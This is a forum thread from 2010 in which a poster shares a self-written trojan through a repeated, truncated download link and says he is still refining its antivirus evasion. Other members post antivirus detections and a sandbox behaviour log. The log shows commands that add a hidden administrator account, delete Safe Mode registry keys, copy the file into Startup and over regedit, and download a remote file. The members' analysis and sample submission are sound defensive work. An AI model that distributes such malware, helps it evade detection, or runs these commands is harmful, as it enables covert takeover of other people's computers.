哈哈有写了个小马发到网上了啊样本在此大家小心了啊

显示全部楼层 · 发表于 2010-7-11 10:13:19

回复 5楼 451102995 的帖子

不好意思啊那天学校断网了没看见上传失败！！饭友见谅啊我把它放到网盘了饭友去下载来帮我看看那

http://gjktoa.blu.livefilestore. ... =1&AVOverride=1

显示全部楼层 · 发表于 2010-7-11 10:13:56

回复 6楼 yonsangoo 的帖子

不好意思啊那天学校断网了没看见上传失败！！饭友见谅啊我把它放到网盘了饭友去下载来帮我看看那

http://gjktoa.blu.livefilestore. ... =1&AVOverride=1

显示全部楼层 · 发表于 2010-7-11 10:14:12

回复 7楼 qianwenxiang 的帖子

不好意思啊那天学校断网了没看见上传失败！！饭友见谅啊我把它放到网盘了饭友去下载来帮我看看那

http://gjktoa.blu.livefilestore. ... =1&AVOverride=1

显示全部楼层 · 发表于 2010-7-11 10:14:29

回复 8楼 Flying_Bird 的帖子

不好意思啊那天学校断网了没看见上传失败！！饭友见谅啊我把它放到网盘了饭友去下载来帮我看看那

http://gjktoa.blu.livefilestore. ... =1&AVOverride=1

显示全部楼层 · 发表于 2010-7-11 10:14:52

回复 9楼 ssama 的帖子

不好意思啊那天学校断网了没看见上传失败！！饭友见谅啊我把它放到网盘了饭友去下载来帮我看看那

http://gjktoa.blu.livefilestore. ... =1&AVOverride=1

显示全部楼层 · 发表于 2010-7-11 10:15:17

回复 10楼 蝉鸣时 的帖子

不好意思啊那天学校断网了没看见上传失败！！饭友见谅啊我把它放到网盘了饭友去下载来帮我看看那

http://gjktoa.blu.livefilestore. ... =1&AVOverride=1

显示全部楼层 · 发表于 2010-7-11 10:15:46

本帖最后由 ssama 于 2010.7.11 10:53 编辑

回复 25楼 高木涉  的帖子
avast!
smss检测.exe [L] Win32:Flot-E [Trj]
Microsoft
TrojanDownloader:Win32/Small.gen!D
行为
Executing: j:\testvirus\smss检测.exe
CreateProcess((null),cmd.exe /c net localgroup administrators sk$ /add,(null))
CreateProcess((null),cmd.exe /c reg delete HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot /f,(null))
Copy(J:\TestVirus\smss检测.exe->C:\Documents and Settings\551x.exe)
Executing: c:\windows\system32\cmd.exe
CreateEvent(ConsoleIME_StartUp_Event)
CreateProcess((null),C:\Windows\system32\conime.exe,(null))
InternetOpen()
Executing: c:\windows\system32\conime.exe
CreateProcess(C:\Windows\System32\net.exe,net  localgroup administrators sk$ /add,J:\TestVirus)
Executing: c:\windows\system32\net.exe
InternetConnect(www.rem.cn)HttpOpenRequest(/bbs/api/top/x.asp)
CreateProcess(C:\Windows\System32\net.exe,net  user sk$ 123456 /add,J:\TestVirus)
CreateProcess((null),C:\Windows\system32\net1  localgroup administrators sk$ /add,(null))
RasEnumEntries()
OpenService(RASMAN)
CreateProcess(C:\Windows\System32\reg.exe,reg  delete HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot /f,J:\TestVirus)
OpenService(Sens)
CreateProcess((null),C:\Windows\system32\net1  user sk$ 123456 /add,(null))
Executing: c:\windows\system32\net1.exe
Executing: c:\windows\system32\reg.exe
CreateMutex(Local\!IETld!Mutex)
bind(port=0)connect( 219.156.123.3:80 )
CreateToolhelp32Snapshot
URLDownloadToFile(http://www.hfbljd.com/WebEdit/Images/top/510.txt)
InternetConnect(www.hfbljd.com)HttpOpenRequest(/WebEdit/Images/top/510.txt)
connect( 127.0.0.1:59739 )
connect( 122.224.34.159:80 )
CreateFile(C:\Windows\x.dat)
DeleteFile(C:\Windows\iexplore.exe)
Copy(J:\TestVirus\smss检测.exe->C:\Documents and Settings\All Users\「开始」菜单\程序\启动551x.exe)
CreateProcess((null),cmd.exe /c taskkill /im regedit.exe /f,(null))
Copy(J:\TestVirus\smss检测.exe->C:\WINDOWS\regedit.exe)
CreateProcess(C:\Windows\System32\taskkill.exe,taskkill  /im regedit.exe /f,J:\TestVirus)
Executing: c:\windows\system32\taskkill.exe
AdjustTokenPrivileges(SE_PRIVILEGE_ENABLED)

这是什么情况

ERROR

显示全部楼层 · 发表于 2010-7-11 10:20:43

本帖最后由幸福的猪猪于 2010.7.11 10:22 编辑

样本提交卡巴斯基。（没有在我的个人电脑进行测试.)

p.s. 提交可疑文件，可以样本区发帖子的。

显示全部楼层 · 发表于 2010-7-11 10:27:17

ess高启
smss检测.rar > RAR > smss检测.exe - 未查明的 NewHeur_PE 病毒

显示全部楼层 · 发表于 2010-7-11 10:45:24

回复 29楼 vmzy 的帖子

我还在做免杀免杀做的不够好啊你用的什么杀软啊

[未鉴定] 哈哈 有写了个小马发到网上了啊 样本在此 大家小心了啊

[未鉴定] 哈哈有写了个小马发到网上了啊样本在此大家小心了啊